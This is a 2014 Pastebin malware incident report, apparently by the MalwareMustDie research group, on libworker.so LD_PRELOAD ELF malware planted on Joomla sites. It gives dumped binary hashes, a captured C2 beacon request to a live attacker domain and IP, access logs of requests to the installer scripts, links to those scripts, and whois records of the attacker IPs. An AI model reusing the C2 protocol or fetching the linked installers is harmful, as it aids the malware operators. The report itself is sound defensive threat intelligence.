SHARE
TWEET

Recent Incident of Linux ELF (LD_PRELOAD) libworker.so

MalwareMustDie Jun 10th, 2014 454 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie NEW Report of .SO ELF Malware attack incident.
  2. # date: Wed Jun 11 06:38:13 JST 2014
  3. # Analysis by @unixfreaxjp - Report thx to: yin
  4. # Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
  5. # CNC is ALIVE in : 89.45.14.64 (VOXILITY, ROMANIA)
  6. # ATTACKER SOURCE IP: 103.31.186.33 (VOXILITY, ROMANIA) &  31.202.247.234 (Leased line ISP Format, UKRAINE)
  7.  
  8. //-------------------------------------
  9. // PHP HACK INJECTION POC
  10. // VICTIMS WEBAPP: JOOMLA!
  11. //-------------------------------------
  12.  
  13. // Reported Injected installation .SO Bins
  14. https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/
  15. https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/
  16.  
  17. // Jinxed code installer PHP scripts in pastebin:
  18. http://pastebin.com/z1K8jxKJ
  19. http://pastebin.com/Pbsk3ZXU
  20.  
  21. // Malware Binaries extracted from installer PHP:
  22. https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/
  23. https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/
  24.  
  25. //-------------------------------------
  26. // CNC ANALYSIS
  27. // Using knowhow from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
  28. //-------------------------------------
  29.  
  30. // Extract the bins w/ template:
  31. $ date
  32. Wed Jun 11 04:12:11 JST 2014
  33. $
  34. $ php ./sodump-template.php
  35. SO x32 dumped 26848
  36. SO x64 dumped 27288
  37. MO x32 dumped 26848
  38. MO x64 dumped 27288
  39. $
  40. $ ls -alF
  41. total 600
  42. drwxrwxrwx   2 xxx xxx    512 Jun 11 04:12 ./
  43. drwxrwxrwx  13 xxx xxx    512 Jun 11 03:59 ../
  44. -rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker1-32.so
  45. -rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker1-64.so
  46. -rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker2-32.so
  47. -rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker2-64.so
  48.  
  49. $ md5 lib*
  50. MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
  51. MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
  52. MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
  53. MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
  54. // noted see only one x32 and one x64 binaries used for multiple injection..
  55.  
  56.  
  57. $ file lib*
  58. libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
  59. libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
  60. libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
  61. libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
  62. $
  63.  
  64. // CNC:
  65.  
  66. POST /kuku/theend.php HTTP/1.0
  67. Host: erstoryunics.us
  68. Pragma: 1337
  69. Content-Length: 84
  70.  
  71. R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
  72. HTTP/1.1 200 OK
  73. Date: Tue, 10 Jun 2014 22:12:22 GMT
  74. Server: Apache/2.2.15 (CentOS)
  75. X-Powered-By: PHP/5.3.3
  76. Content-Length: 6
  77. Connection: close
  78. Content-Type: text/html; charset=UTF-8
  79. R,200
  80.  
  81. // CNC INFO (NETWORK & GEOIP)
  82.  
  83. $ echo `dig +short erstoryunics.us`|bash origin.sh
  84. Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
  85. IP Address, City, Country Name, Latitude, longitude, Time Zone
  86. 89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest
  87.  
  88. //-------------------------------------
  89. // ATTACK TIME RANGE:
  90. //-------------------------------------
  91.  
  92. First session: [22/May/2014:13:01:08 +1000]
  93. 2nd Session First: [09/Jun/2014:07:50:46 +1000]
  94. 2nd Session Latest:[10/Jun/2014:04:39:51 +1000]
  95.  
  96. //-------------------------------------
  97. // ATTACKER ACCESS POC & SOURCE IP POC:
  98. //-------------------------------------
  99.  
  100. // Attacker access log aiming the PHP .SO Malware installer PHP script:
  101.  
  102. 103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  103. 103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  104. 103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  105. 103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  106. 103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
  107. 103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  108. 103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  109. 103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  110. 103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
  111. 31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
  112.  
  113.  
  114. //-------------------------------------
  115. // Tracing attacker source IP: 103.31.186.33 (ROMANIA)
  116. //-------------------------------------
  117.  
  118. $ whois 103.31.186.33
  119. % [whois.apnic.net]
  120. % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
  121.  
  122. % Information related to '103.31.186.0 - 103.31.186.127'
  123.  
  124. inetnum: 103.31.186.0 - 103.31.186.127
  125. netname: Saulhost
  126. descr: Saulhost Hosting
  127. country: RO
  128. admin-c: MT669-AP
  129. tech-c: MT669-AP
  130. status: ASSIGNED NON-PORTABLE
  131. remarks: INFRA-AW
  132. mnt-by: MAINT-HK-VOXILITY
  133. mnt-lower: MAINT-HK-VOXILITY
  134. mnt-routes: MAINT-HK-VOXILITY
  135. mnt-irt: IRT-VOXILITY-AP
  136. changed: noc@voxility.com 20130118
  137. source: APNIC
  138.  
  139. irt: IRT-VOXILITY-AP
  140. address: Dimitrie Pompeiu 9-9A
  141. address: Building 24
  142. address: Bucharest 020335
  143. address: Romania
  144. e-mail: noc@voxility.com
  145. abuse-mailbox: noc@voxility.com
  146. admin-c: VOX100
  147. tech-c: VOX100
  148. auth: # Filtered
  149. mnt-by: MAINT-HK-VOXILITY
  150. changed: noc@voxility.com 20121015
  151. source: APNIC
  152.  
  153. person: Michael Ter-Sahakyan
  154. address: Terbatas 14
  155. address: LV-1011 Riga
  156. address: Latvia
  157. country: RO
  158. phone: +37166163312
  159. e-mail: abuses@saulhost.com
  160. nic-hdl: MT669-AP
  161. remarks: INFRA-AW
  162. abuse-mailbox: abuses@saulhost.com
  163. mnt-by: MAINT-HK-VOXILITY
  164. changed: noc@voxility.com 20130118
  165. source: APNIC
  166.  
  167. //-------------------------------------
  168. // Tracing attacker source IP: 31.202.247.234 (UKRAINE)
  169. //-------------------------------------
  170.  
  171.  
  172. $ whois 31.202.247.234
  173. % This is the RIPE Database query service.
  174. % The objects are in RPSL format.
  175. %
  176. % The RIPE Database is subject to Terms and Conditions.
  177. % See http://www.ripe.net/db/support/db-terms-conditions.pdf
  178.  
  179. % Note: this output has been filtered.
  180. % To receive output for a database update, use the "-B" flag.
  181.  
  182. % Information related to '31.202.192.0 - 31.202.255.255'
  183.  
  184. % Abuse contact for '31.202.192.0 - 31.202.255.255' is 'abuse@maxnet.ua'
  185.  
  186. inetnum: 31.202.192.0 - 31.202.255.255
  187. netname: FORMAT-TV-NET-5
  188. descr: MSP Format Ltd.
  189. country: UA
  190. admin-c: FA4288-RIPE
  191. tech-c: FA4288-RIPE
  192. status: ASSIGNED PA
  193. mnt-by: FORMAT-TV-MNT
  194. mnt-domains: FORMAT-TV-MNT
  195. mnt-routes: FORMAT-TV-MNT
  196. source: RIPE # Filtered
  197.  
  198. person: Format Admin
  199. address: Ukraine Mariupol
  200. phone: +380629422490
  201. nic-hdl: FA4288-RIPE
  202. mnt-by: FORMAT-TV-MNT
  203. source: RIPE # Filtered
  204.  
  205. % Information related to '31.202.247.0/24AS6712'
  206.  
  207. route: 31.202.247.0/24
  208. descr: Leased line ISP Format
  209. origin: AS6712
  210. mnt-by: FORMAT-TV-MNT
  211. source: RIPE # Filtered
  212.  
  213.  
  214. ---
  215. #MalwareMustDie!!
RAW Paste Data
Want to get better at JavaScript?
Learn to code JavaScript in 2017
Top